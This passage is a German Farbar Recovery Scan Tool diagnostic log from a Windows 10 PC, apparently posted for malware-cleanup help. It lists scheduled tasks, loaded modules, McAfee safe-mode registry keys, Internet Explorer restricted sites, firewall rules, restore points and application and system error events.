Task: {E5A79759-A1E5-4504-9DC9-EF39A11CEE10} - System32\Tasks\Intel\Thunderbolt\Start Thunderbolt application when hardware is detected => Thunderbolt.exe
Task: {F23FDE87-46F6-4D5A-B9A8-E82B4D60B496} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-12-30] (Adobe Systems Incorporated)
Task: {FBC0C790-05C2-474C-A58F-4ACC31897F13} - System32\Tasks\UbtFrameworkService => C:\Program Files\Acer\User Experience Improvement Program\Framework\TriggerFramework.exe [2014-03-13] (TODO: <Company name>)
Task: {FC47B778-B114-42D5-B0B0-AEA96ED26366} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-29] (Google Inc.)
Task: {FD9CD07F-A21E-48CC-8EAC-734DCEA79FD2} - System32\Tasks\BacKGroundAgent => C:\Program Files (x86)\Acer\AOP Framework\BackgroundAgent.exe [2016-01-14] (Acer Incorporated)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2015-09-03 15:48 - 2015-09-03 15:48 - 05570064 _____ () C:\WINDOWS\system32\IntelSSTAPO\ParameterService\libxml2-2.dll
2015-09-15 02:58 - 2015-09-15 02:58 - 00176640 _____ () C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe
2016-04-21 14:48 - 2016-04-03 04:34 - 00172224 _____ () C:\Program Files\Common Files\Microsoft Shared\ClickToRun\ApiClient.dll
2016-03-02 21:04 - 2016-03-02 21:04 - 00465088 _____ () C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe
2016-01-26 18:54 - 2016-01-26 18:54 - 00066872 _____ () C:\WINDOWS\SysWOW64\PnkBstrA.exe
2015-10-30 09:18 - 2015-10-30 09:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2015-12-30 00:51 - 2015-07-23 03:10 - 00116552 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-04-13 20:23 - 2016-03-29 12:20 - 02656952 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-04-13 20:23 - 2016-03-29 12:20 - 02656952 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-04-19 16:49 - 2016-04-19 16:49 - 00959176 _____ () C:\Users\Maximilian\AppData\Local\Microsoft\OneDrive\17.3.6386.0412\amd64\ClientTelemetry.dll
2016-04-19 15:58 - 2016-04-19 15:58 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2015-09-07 09:13 - 2015-09-05 17:16 - 00395880 _____ () C:\WINDOWS\system32\igfxTray.exe
2015-12-30 00:41 - 2015-12-30 00:41 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-04-13 20:22 - 2016-04-02 05:25 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-04-13 20:22 - 2016-04-02 05:03 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-04-13 20:22 - 2016-04-02 04:58 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-04-13 20:22 - 2016-04-02 04:59 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-04-13 20:22 - 2016-04-02 05:02 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-04-13 20:22 - 2016-04-02 05:00 - 00936960 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2015-06-16 04:53 - 2015-06-16 04:53 - 00628736 _____ () C:\Program Files\Dolby\Dolby DAX2\DAX2_APP\DolbyDAX2TrayIcon.exe
2015-03-07 02:07 - 2015-03-07 02:07 - 00908568 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll
2015-11-20 23:41 - 2015-11-20 23:41 - 01095448 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll
2015-03-07 02:07 - 2015-03-07 02:07 - 00060184 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll
2015-11-20 23:41 - 2015-11-20 23:41 - 00240408 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll
2015-11-02 19:45 - 2015-05-14 09:10 - 00030976 _____ () C:\OEM\Preload\FubTracking\FubTracking.exe
2016-04-14 17:44 - 2015-12-23 17:17 - 00625440 _____ () C:\Program Files (x86)\IObit\LiveUpdate\ProductStatistics.dll
2015-08-07 02:09 - 2015-08-07 02:09 - 01243936 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
2015-11-02 19:24 - 2015-07-14 06:07 - 00011920 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2016-04-19 16:49 - 2016-04-19 16:49 - 00679624 _____ () C:\Users\Maximilian\AppData\Local\Microsoft\OneDrive\17.3.6386.0412\ClientTelemetry.dll
2016-04-14 17:40 - 2016-04-14 17:40 - 40500224 _____ () C:\Program Files (x86)\AVG\UiDll\2171\libcef.dll
2016-04-12 13:08 - 2016-04-06 12:04 - 01675928 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.112\libglesv2.dll
2016-04-12 13:08 - 2016-04-06 12:04 - 00086168 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.112\libegl.dll
2015-11-16 20:55 - 2015-11-16 20:55 - 00202456 _____ () C:\Program Files (x86)\Acer\abPhoto\curllib.dll
2015-11-16 20:56 - 2015-11-16 20:56 - 00641240 _____ () C:\Program Files (x86)\Acer\abPhoto\tag.dll
2015-11-16 20:56 - 2015-11-16 20:56 - 00654000 _____ () C:\Program Files (x86)\Acer\abPhoto\sqlite3.dll
2015-11-16 20:56 - 2015-11-16 20:56 - 00119000 _____ () C:\Program Files (x86)\Acer\abPhoto\OpenLDAP.dll
2016-02-04 15:06 - 2016-02-04 15:06 - 00015064 _____ () C:\WINDOWS\assembly\GAC_MSIL\MyService\1.0.0.1__2dfa3f50f0bed57d\MyService.dll
2016-01-14 18:12 - 2016-01-14 18:12 - 00013016 _____ () C:\Program Files (x86)\Acer\AOP Framework\ServiceInterface.dll
2016-01-14 18:11 - 2016-01-14 18:11 - 00277856 _____ () C:\Program Files (x86)\Acer\AOP Framework\libcurl.dll
2015-08-31 12:50 - 2015-04-30 02:04 - 38561984 _____ () C:\Program Files\AVAST Software\SecureLine\libcef.dll
2016-04-19 15:58 - 2016-04-19 15:58 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-04-19 15:58 - 2016-04-19 15:59 - 22284800 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkyWrap.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"

==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

IE trusted site: HKU\.DEFAULT\...\amazon.de -> hxxps://amazon.de
IE trusted site: HKU\S-1-5-21-1076315954-907306345-2410837627-1001\...\amazon.de -> amazon.de
IE restricted site: HKU\S-1-5-21-1076315954-907306345-2410837627-1001\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-1076315954-907306345-2410837627-1001\...\008k.com -> 008k.com
IE restricted site: HKU\S-1-5-21-1076315954-907306345-2410837627-1001\...\00hq.com -> 00hq.com
IE restricted site: HKU\S-1-5-21-1076315954-907306345-2410837627-1001\...\0190-dialers.com -> 0190-dialers.com
IE restricted site: HKU\S-1-5-21-1076315954-907306345-2410837627-1001\...\01i.info -> 01i.info
IE restricted site: HKU\S-1-5-21-1076315954-907306345-2410837627-1001\...\02pmnzy5eo29bfk4.com -> 02pmnzy5eo29bfk4.com
IE restricted site: HKU\S-1-5-21-1076315954-907306345-2410837627-1001\...\05p.com -> 05p.com
IE restricted site: HKU\S-1-5-21-1076315954-907306345-2410837627-1001\...\07ic5do2myz3vzpk.com -> 07ic5do2myz3vzpk.com
IE restricted site: HKU\S-1-5-21-1076315954-907306345-2410837627-1001\...\08nigbmwk43i01y6.com -> 08nigbmwk43i01y6.com
IE restricted site: HKU\S-1-5-21-1076315954-907306345-2410837627-1001\...\093qpeuqpmz6ebfa.com -> 093qpeuqpmz6ebfa.com
IE restricted site: HKU\S-1-5-21-1076315954-907306345-2410837627-1001\...\0calories.net -> 0calories.net
IE restricted site: HKU\S-1-5-21-1076315954-907306345-2410837627-1001\...\0cj.net -> 0cj.net
IE restricted site: HKU\S-1-5-21-1076315954-907306345-2410837627-1001\...\0scan.com -> 0scan.com
IE restricted site: HKU\S-1-5-21-1076315954-907306345-2410837627-1001\...\1-britney-spears-nude.com -> 1-britney-spears-nude.com
IE restricted site: HKU\S-1-5-21-1076315954-907306345-2410837627-1001\...\1-domains-registrations.com -> 1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-1076315954-907306345-2410837627-1001\...\1-se.com -> 1-se.com
IE restricted site: HKU\S-1-5-21-1076315954-907306345-2410837627-1001\...\1001movie.com -> 1001movie.com
IE restricted site: HKU\S-1-5-21-1076315954-907306345-2410837627-1001\...\1001night.biz -> 1001night.biz
IE restricted site: HKU\S-1-5-21-1076315954-907306345-2410837627-1001\...\100gal.net -> 100gal.net
IE restricted site: HKU\S-1-5-21-1076315954-907306345-2410837627-1001\...\100sexlinks.com -> 100sexlinks.com

Da befinden sich 4788 mehr Seiten.


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2015-07-10 13:04 - 2016-02-10 12:32 - 00000824 ____N C:\WINDOWS\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-1076315954-907306345-2410837627-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Maximilian\Pictures\M5.jpg
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)


==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{31F3B593-12CA-4268-9813-9B41E844C93E}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{C991CE08-D30E-4015-969D-32A8DE91A5B5}] => (Allow) D:\SteamLibrary\steamapps\common\Trove\GlyphClient.exe
FirewallRules: [{91012B6A-9E63-485F-A6F1-3AC0A15EFBBA}] => (Allow) D:\SteamLibrary\steamapps\common\Trove\GlyphClient.exe
FirewallRules: [{B8AF4B3B-D373-47B2-8105-8D2985D61289}] => (Allow) D:\The Crew (Worldwide)\TheCrew.exe
FirewallRules: [{5B786C14-2523-4EF3-AF7E-FAD78525B593}] => (Allow) D:\The Crew (Worldwide)\TheCrew.exe
FirewallRules: [{F33914D6-B58B-4AF1-8831-A2872B761912}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{03C002F4-7AFD-4453-A94C-24A4901ABAB7}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{C2AE5A8A-1237-48BA-A7A1-236561CEAAFC}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{4459F69E-9D31-4399-AA7A-5A53F1C8BC26}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{B39FD803-4639-4B01-A0AD-014B338229CA}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Movie\PowerDVD.exe
FirewallRules: [{EE498413-FA8B-41D8-A8AF-E0967CF9F587}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12ML.exe
FirewallRules: [{967B7FEC-6D18-4D44-8B27-485C71724057}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12.exe
FirewallRules: [{B441C609-4E6A-4943-801E-EE3BAAFC5850}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{5E00DF5C-62B3-4304-8782-4FE9C3459787}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{913FBC63-3521-4224-8967-53F50C17390D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{A05DC8AA-45BA-44D3-A7A2-37FF8631858F}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{F8E0F133-FE65-444C-AA30-791EA7222BB2}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{784A6833-E819-4460-B9E6-DC075D120CFA}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{DB7F43D2-B8E9-4FCF-BD13-B9AEE8E85244}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{BA76611A-53EA-4E98-9240-01D77C34D7E0}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\WindowsUpnp.exe
FirewallRules: [{9374E55F-F31F-454E-8D92-4D68414A5ACB}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\WindowsUpnp.exe
FirewallRules: [{05EBF720-9C08-4032-9F83-DDB35AB3D67E}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\DMCDaemon.exe
FirewallRules: [{D1449E72-5288-4FF3-88B1-34F6AC527BFF}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\DMCDaemon.exe
FirewallRules: [{153D9351-68F9-4CE6-AE66-5419EB374260}] => (Allow) C:\Program Files (x86)\Acer\AOP Framework\acer\ccd.exe
FirewallRules: [{227DE642-B4A4-40DB-B65D-741AF59B20FE}] => (Allow) C:\Program Files (x86)\Acer\AOP Framework\acer\ccd.exe
FirewallRules: [{E0BBD98A-E2CA-44F7-97E6-4DC6B859B476}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{DA225F5C-C571-418A-9132-30223D45C585}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{91692DC0-BF42-45CE-82A5-6E667F038C2E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{FAFCD51A-6B03-4B36-A09F-9ADF4A69EA24}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [UDP Query User{9C2DB366-A212-4E92-B07F-FA7B04CB0765}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [{186C4066-832A-4D0B-955A-270A0C517088}] => (Allow) C:\Program Files (x86)\Origin Games\Need for Speed(TM) Most Wanted\NFS13.exe
FirewallRules: [{A1BE65EA-954A-4851-B507-AA5B17D576AC}] => (Allow) C:\Program Files (x86)\Origin Games\Need for Speed(TM) Most Wanted\NFS13.exe
FirewallRules: [{C4314946-F2D6-4C79-B615-5E3BCC30F79D}] => (Allow) D:\SteamLibrary\steamapps\common\raceroom racing experience\Game\RRRE.exe
FirewallRules: [{CB219F45-AD1F-4F65-8730-2DB8B8FA12C6}] => (Allow) D:\SteamLibrary\steamapps\common\raceroom racing experience\Game\RRRE.exe
FirewallRules: [{2CBED4D8-BE16-4FF3-A353-A12A905CF00D}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{8B1F90D2-D91B-48EC-8D85-9EBC7C79DE1D}] => (Allow) D:\Program Files (x86)\Origin Games\Medal of Honor Pacific Assault\mohpa.exe
FirewallRules: [{E51949AB-75D1-41D6-A3B3-720BB56F0A3D}] => (Allow) D:\Program Files (x86)\Origin Games\Medal of Honor Pacific Assault\mohpa.exe
FirewallRules: [{7524FD2E-55E1-48B2-9A4C-9EF7E9453086}] => (Allow) D:\Program Files (x86)\Origin Games\Medal of Honor Pacific Assault\mohpa_setup.exe
FirewallRules: [{DE917874-3CE2-4501-BBF0-A3FE676A86B7}] => (Allow) D:\Program Files (x86)\Origin Games\Medal of Honor Pacific Assault\mohpa_setup.exe
FirewallRules: [{66A9A019-C7B8-4FE7-8E6A-7FD0DA6B17C9}] => (Allow) D:\Program Files (x86)\Origin Games\Peggle Deluxe\Peggle.exe
FirewallRules: [{FDDAB88A-551F-4FA7-923A-EE4CCB5541AA}] => (Allow) D:\Program Files (x86)\Origin Games\Peggle Deluxe\Peggle.exe
FirewallRules: [{7AB5A160-BBDA-4A0F-AB14-1DD2E7EC94D5}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{3BE2F589-9854-484B-AD40-5BDDAF6C5CE9}] => (Allow) D:\Program Files (x86)\Origin Games\Need for Speed\NFS16.exe
FirewallRules: [{E370F1A5-8AF5-4BF9-8D5C-D4022D63F022}] => (Allow) D:\Program Files (x86)\Origin Games\Need for Speed\NFS16.exe
FirewallRules: [{627E8754-3B8E-4844-9764-862C022320BB}] => (Allow) D:\Program Files (x86)\Origin Games\Need for Speed\NFS16_trial.exe
FirewallRules: [{06CF959C-8FA1-4C73-B8C9-3852326EC662}] => (Allow) D:\Program Files (x86)\Origin Games\Need for Speed\NFS16_trial.exe

==================== Wiederherstellungspunkte =========================

23-04-2016 21:40:47 SpyHunter 4 restore point
26-04-2016 17:17:14 Revo Uninstaller's restore point - Bronze Aid
28-04-2016 20:14:46 JRT Pre-Junkware Removal

==================== Fehlerhafte Geräte im Gerätemanager =============

Name: 
Description: 
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (04/28/2016 08:14:48 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft-Verbindungsschichterkennungsprotokoll.

System Error:
Zugriff verweigert
.

Error: (04/28/2016 06:04:16 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm explorer.exe, Version 10.0.10586.104 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 1b68

Startzeit: 01d1a160d5f5a920

Beendigungszeit: 0

Anwendungspfad: C:\Windows\explorer.exe

Berichts-ID: d58bed2c-0d5a-11e6-9c03-3065ec8dd608

Vollständiger Name des fehlerhaften Pakets: 

Auf das fehlerhafte Paket bezogene Anwendungs-ID:

Error: (04/28/2016 06:04:11 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LAPTOP-6N843D06)
Description: Bei der Aktivierung der App „Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy!App“ ist folgender Fehler aufgetreten: -2147023170. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (04/28/2016 06:04:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: ShellExperienceHost.exe, Version: 10.0.10586.218, Zeitstempel: 0x56ff3cf7
Name des fehlerhaften Moduls: Windows.UI.Xaml.dll, Version: 10.0.10586.212, Zeitstempel: 0x56fa191c
Ausnahmecode: 0xc000027b
Fehleroffset: 0x00000000006fd4eb
ID des fehlerhaften Prozesses: 0x6f8c
Startzeit der fehlerhaften Anwendung: 0xShellExperienceHost.exe0
Pfad der fehlerhaften Anwendung: ShellExperienceHost.exe1
Pfad des fehlerhaften Moduls: ShellExperienceHost.exe2
Berichtskennung: ShellExperienceHost.exe3
Vollständiger Name des fehlerhaften Pakets: ShellExperienceHost.exe4
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: ShellExperienceHost.exe5

Error: (04/28/2016 05:07:04 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm adwcleaner_5.114 (1).exe, Version 5.1.1.4 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 7e68

Startzeit: 01d1a15f8ab138fc

Beendigungszeit: 4294967295

Anwendungspfad: C:\Users\Maximilian\Downloads\adwcleaner_5.114 (1).exe

Berichts-ID: dd5e0a8d-0d52-11e6-9c03-3065ec8dd608

Vollständiger Name des fehlerhaften Pakets: 

Auf das fehlerhafte Paket bezogene Anwendungs-ID:

Error: (04/28/2016 05:06:05 PM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Subscription licensing service failed: -1073418220

Error: (04/27/2016 08:45:01 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm Skype.exe, Version 7.21.0.100 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 3024

Startzeit: 01d1a0b22327ba9c

Beendigungszeit: 4294967295

Anwendungspfad: C:\Program Files (x86)\Skype\Phone\Skype.exe

Berichts-ID: 2522773c-0ca8-11e6-9c03-3065ec8dd608

Vollständiger Name des fehlerhaften Pakets: 

Auf das fehlerhafte Paket bezogene Anwendungs-ID:

Error: (04/27/2016 08:43:56 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: TheCrew.exe, Version: 1.1.4.0, Zeitstempel: 0x5707f415
Name des fehlerhaften Moduls: LogitechSteeringWheel.dll, Version: 8.45.88.0, Zeitstempel: 0x546a8dc3
Ausnahmecode: 0xc0000409
Fehleroffset: 0x0000000000010584
ID des fehlerhaften Prozesses: 0x693c
Startzeit der fehlerhaften Anwendung: 0xTheCrew.exe0
Pfad der fehlerhaften Anwendung: TheCrew.exe1
Pfad des fehlerhaften Moduls: TheCrew.exe2
Berichtskennung: TheCrew.exe3
Vollständiger Name des fehlerhaften Pakets: TheCrew.exe4
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: TheCrew.exe5

Error: (04/27/2016 08:41:56 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: regsvr32.exe, Version: 10.0.10586.0, Zeitstempel: 0x5632d7fb
Name des fehlerhaften Moduls: ntdll.dll, Version: 10.0.10586.122, Zeitstempel: 0x56cc16f5
Ausnahmecode: 0xc0000409
Fehleroffset: 0x0008b5a0
ID des fehlerhaften Prozesses: 0x77a4
Startzeit der fehlerhaften Anwendung: 0xregsvr32.exe0
Pfad der fehlerhaften Anwendung: regsvr32.exe1
Pfad des fehlerhaften Moduls: regsvr32.exe2
Berichtskennung: regsvr32.exe3
Vollständiger Name des fehlerhaften Pakets: regsvr32.exe4
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: regsvr32.exe5

Error: (04/27/2016 04:57:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: TheCrew.exe, Version: 1.1.4.0, Zeitstempel: 0x5707f415
Name des fehlerhaften Moduls: LogitechSteeringWheel.dll, Version: 8.45.88.0, Zeitstempel: 0x546a8dc3
Ausnahmecode: 0xc0000409
Fehleroffset: 0x0000000000010584
ID des fehlerhaften Prozesses: 0x4394
Startzeit der fehlerhaften Anwendung: 0xTheCrew.exe0
Pfad der fehlerhaften Anwendung: TheCrew.exe1
Pfad des fehlerhaften Moduls: TheCrew.exe2
Berichtskennung: TheCrew.exe3
Vollständiger Name des fehlerhaften Pakets: TheCrew.exe4
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: TheCrew.exe5


Systemfehler:
=============
Error: (04/28/2016 09:20:40 PM) (Source: TPM) (EventID: 12) (User: )
Description: Beim Gerätetreiber für das Trusted Platform Module (TPM) ist ein Fehler in der TPM-Hardware aufgetreten, der dazu führen kann, dass einige Anwendungen, die TPM-Dienste verwenden, nicht ordnungsgemäß ausgeführt werden. Starten Sie den Computer neu, um die TPM-Hardware zurückzusetzen. Wenn Sie weitere Unterstützung benötigen, wenden Sie sich an den Computerhersteller, um weitere Informationen zu erhalten.

Error: (04/28/2016 09:20:27 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Das Zeitlimit (30000 ms) wurde beim Warten auf eine Transaktionsrückmeldung von Dienst avgsvc erreicht.

Error: (04/28/2016 09:19:51 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Benutzerdatenzugriff_21eb23a" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/28/2016 09:19:51 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Benutzerdatenspeicher _21eb23a" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/28/2016 09:19:51 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Kontaktdaten_21eb23a" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/28/2016 09:19:51 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
